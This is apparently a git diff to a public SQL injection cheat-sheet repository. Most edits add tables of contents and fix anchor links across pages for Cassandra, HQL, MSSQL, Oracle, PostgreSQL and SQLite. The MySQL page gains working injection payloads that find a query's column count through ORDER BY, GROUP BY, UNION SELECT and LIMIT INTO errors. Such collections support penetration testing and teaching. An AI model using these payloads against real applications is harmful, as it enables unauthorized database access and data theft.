diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index e66949e..2396618 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -2,6 +2,14 @@ > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system +## Summary + +* [Cassandra comment](#cassandra-comment) +* [Cassandra - Login Bypass](#cassandra---login-bypass) + * [Login Bypass 0](#login-bypass-0) + * [Login Bypass 1](#login-bypass-1) +* [References](#references) + ## Cassandra comment ```sql @@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h ## References -* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 0086f10..6e8168b 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,6 +1,12 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia +## Summary + +* [HQL Comments](#hql-comments) +* [HQL List Columns](#hql-list-columns) +* [HQL Error Based](#hql-error-based) +* [References](#references) ## HQL Comments @@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) \ No newline at end of file +* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index fa30aa6..0e79365 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -5,18 +5,18 @@ * [MSSQL comments](#mssql-comments) * [MSSQL version](#mssql-version) * [MSSQL database name](#mssql-database-name) -* [MSSQL List databases](#mssql-list-database) +* [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) -* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) -* [MSSQL Make user DBA](#mssql-make-user-dba) +* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) ## MSSQL comments diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index f61cc52..9dd034c 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -3,10 +3,10 @@ ## Summary * [MYSQL Comment](#mysql-comment) -* [Detect columns number](#detect-columns-number) * [MYSQL Union Based](#mysql-union-based) - * [Extract database with information_schema](#extract-database-with-information-schema) - * [Extract data without information_schema](#extract-data-without-information-schema) + * [Detect columns number](#detect-columns-number) + * [Extract database with information_schema](#extract-database-with-information_schema) + * [Extract columns name without information_schema](#extract-columns-name-without-information_schema) * [Extract data without columns name](#extract-data-without-columns-name) * [MYSQL Error Based](#mysql-error-based) * [MYSQL Error Based - Basic](#mysql-error-based---basic) @@ -15,10 +15,10 @@ * [MYSQL Blind](#mysql-blind) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) - * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) - * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using SLEEP in a subselect](#using-sleep-in-a-subselect) * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) @@ -46,17 +46,76 @@ ## MYSQL Union Based -### Extract database with information_schema +### Detect columns number -First you need to know the number of columns, you can use `order by`. +First you need to know the number of columns + +##### Using `order by` or `group by` + +Keep incrementing the number until you get a False response. +Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. ```sql -order by 1 -order by 2 -order by 3 -... -order by XXX +1' ORDER BY 1--+ #True +1' ORDER BY 2--+ #True +1' ORDER BY 3--+ #True +1' ORDER BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True ``` +or +```sql +1' GROUP BY 1--+ #True +1' GROUP BY 2--+ #True +1' GROUP BY 3--+ #True +1' GROUP BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `order by` or `group by` Error Based +Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. +```sql +1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'order clause' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +or +```sql +1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'group statement' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +##### Using `UNION SELECT` Error Based +This method works if error showing is enabled +```sql +1' UNION SELECT @--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `LIMIT INTO` Error Based +This method works if error showing is enabled. + +It is useful for finding the number of columns when the injection point is after a LIMIT clause. +```sql +1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based +This works if you know the table name you're after and error showing is enabled. + +It will return the amount of columns in the table, not the query. + +```sql +1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s) + # This error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 0228cd9..633e24c 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,18 @@ # Oracle SQL Injection +## Summary + +* [Oracle SQL version](#oracle-sql-version) +* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL List databases](#oracle-sql-list-databases) +* [Oracle SQL List columns](#oracle-sql-list-columns) +* [Oracle SQL List tables](#oracle-sql-list-tables) +* [Oracle SQL Error Based](#oracle-sql-error-based) +* [Oracle SQL Blind](#oracle-sql-blind) +* [Oracle SQL Time Based](#oracle-sql-time-based) +* [Oracle SQL Command execution](#oracle-sql-command-execution) +* [References](#references) + ## Oracle SQL version ```sql @@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` -## Oracle SQL List Column +## Oracle SQL List Columns ```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2bf952c..00bbbf4 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -20,8 +20,8 @@ * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) - * [CVE-2019–9193](#cve-2019–9193) - * [Using libc.so.6](#using-libc-so-6) + * [CVE-2019–9193](#cve-20199193) + * [Using libc.so.6](#using-libcso6) * [References](#references) ## PostgreSQL Comments diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8d5162b..25b035e 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including: * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) @@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) + * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 0631c0b..428e806 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -1,5 +1,18 @@ # SQLite Injection +## Summary + +* [SQLite comments](#sqlite-comments) +* [SQLite version](#sqlite-version) +* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) +* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) +* [Boolean - Count number of tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating table name](#boolean---enumerating-table-name) +* [Boolean - Extract info](#boolean---extract-info) +* [Time based](#time-based) +* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) +* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) +* [References](#references) ## SQLite comments ```sql